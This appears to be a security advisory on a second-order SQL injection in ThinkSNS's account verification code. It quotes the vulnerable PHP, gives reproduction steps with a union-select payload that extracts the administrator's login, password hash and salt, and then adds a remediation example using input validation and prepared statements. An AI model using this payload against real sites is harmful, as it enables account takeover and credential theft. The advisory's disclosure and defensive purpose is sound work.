<ul><li>/apps/public/Lib/Action/AccountAction.class.php</li></ul>
<pre class=""> public function doAuthenticate(){
$verifyInfo = D('user_verified')->where('uid='.$this->mid)->find();
$data['usergroup_id'] = intval($_POST['usergroup_id']);
if(!$data['usergroup_id']) $data['usergroup_id'] = 5;
……
//$data['info'] = t($_POST['info']);
$data['attach_id'] = t($_POST['attach_ids']);
if(D('user_verified_category')->where('pid='.$data['usergroup_id'])->find()){
$data['user_verified_category_id'] = intval($_POST['verifiedCategory']);
}else{
$data['user_verified_category_id'] = 0;
}
……
if($verifyInfo){
$data['verified'] = 0;
$res = D('user_verified')->where('uid='.$verifyInfo['uid'])->save($data);
}else{
$data['uid'] = $this->mid;
$res = D('user_verified')->add($data);
}
……
}
</pre>
<p>attach_ids is written to the database as-is.</p>
<pre class=""> public function authenticate(){
$auType = model('UserGroup')->where('is_authenticate=1')->findall();
$this->assign('auType', $auType);
$verifyInfo = D('user_verified')->where('uid='.$this->mid)->find();
if($verifyInfo['attach_id']){
$a = explode('|', $verifyInfo['attach_id']);
foreach($a as $key=>$val){
if($val !== ""){
$verifyInfo['attachment'] .= D('attach')->where("attach_id=$a[$key]")->getField('name').'&nbsp;<a href="'.U('widget/Upload/down',array('attach_id'=>$a[$key])).'" target="_blank">下载</a><br />';
}
}
}
</pre>
<p>attach_ids is split on "|" and each piece is interpolated straight into the SQL query. Because the stored attach_ids value is attacker-controlled (see doAuthenticate above), this is a second-order SQL injection.</p>
<p>Register an account, log in, and visit:</p>
<pre class="">http://10.211.55.12/thinksns/index.php?app=public&mod=Account&act=Authenticate</pre>
<p>Fill in the required fields, upload any image, and change attach_ids to:</p>
<pre class="">|77|-1 un<a>ion se<a>lect co<a>ncat(login,0x23,password,0x3a,login_salt) fr<a>om ts_user li<a>mit 1#</pre>
<p><img alt="2CCA9FB7-2B39-4037-98B8-741B5E776EAC.png" src="https://images.seebug.org/@/uploads/1434093460362-2CCA9FB7-2B39-4037-98B8-741B5E776EAC.png" data-image-size="821,662"><br></p>
<p>Click submit and visit the URL above again; the administrator's username and password are returned:</p>
<p><img alt="3A396FFB-FD9C-44EC-B411-8AF9ADD7726A.png" src="https://images.seebug.org/@/uploads/1434093481265-3A396FFB-FD9C-44EC-B411-8AF9ADD7726A.png" data-image-size="720,201"><br></p>
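<p>The fix has two parts, one on the write side (doAuthenticate) and one on the read side (authenticate): normalize attach_ids to a canonical list of integers before it is stored, and when it is read back, re-validate it and bind the values as parameters instead of interpolating them. The PHP below is an added example, not ThinkSNS or ThinkPHP code; it reuses the table and column names from the report (attach, attach_id, name) against a constructed in-memory SQLite table, and the function names are hypothetical.</p>

```php
<?php
// Added example, not ThinkSNS code: defensive handling of the attach_ids
// field that the report shows being stored raw and later concatenated into
// "attach_id=$a[$key]". Either control alone breaks the second-order injection.

/**
 * Write-side control for doAuthenticate(): normalize a user-supplied string
 * such as "|77|12|" into canonical "|77|12|" form. Any non-numeric piece
 * (e.g. "-1 union select ...") makes the whole value invalid and returns null,
 * so the caller can reject the request instead of storing the value.
 */
function normalizeAttachIds(string $raw): ?string
{
    $ids = [];
    foreach (explode('|', $raw) as $part) {
        if ($part === '') {
            continue;                 // tolerate leading/trailing '|'
        }
        if (!ctype_digit($part)) {
            return null;              // reject anything that is not a plain integer
        }
        $ids[] = (int) $part;
    }
    return $ids ? '|' . implode('|', $ids) . '|' : '';
}

/**
 * Read-side control for authenticate(): parse whatever is in the database
 * back into integers and silently drop everything else. Even if a bad value
 * reached the table (older rows, direct edits), only integers reach SQL.
 */
function storedAttachIdsToInts(string $stored): array
{
    $ids = [];
    foreach (explode('|', $stored) as $part) {
        if ($part !== '' && ctype_digit($part)) {
            $ids[] = (int) $part;
        }
    }
    return $ids;
}

/**
 * Look up attachment names with a prepared statement and one placeholder per
 * id, instead of building "attach_id=$a[$key]" by string interpolation.
 * Returns [attach_id => name]. The PDO connection is assumed to exist.
 */
function fetchAttachNames(PDO $pdo, array $ids): array
{
    if (!$ids) {
        return [];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare(
        "SELECT attach_id, name FROM attach WHERE attach_id IN ($placeholders)"
    );
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_KEY_PAIR);
}

// --- demonstration against a constructed in-memory SQLite table ---
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE attach (attach_id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO attach VALUES (77, 'id-card.png'), (78, 'other.png')");

// Constructed inputs: a legitimate upload list and an injection-style value
// of the shape the report describes.
$legit   = '|77|';
$tainted = '|77|-1 union select 1#';

// Write side: the legitimate value is stored canonically, the tainted one is refused.
var_dump(normalizeAttachIds($legit));
var_dump(normalizeAttachIds($tainted));

// Read side: even a tainted stored value yields only integer ids, and the
// lookup is parameterized, so the SQL fragment is never executed.
$ids = storedAttachIdsToInts($tainted);
var_dump($ids);
print_r(fetchAttachNames($pdo, $ids));
```

<p>Applying both controls is deliberate: the write-side check gives a clear rejection to the user, while the read-side check protects rows that were written before the fix or by another code path.</p>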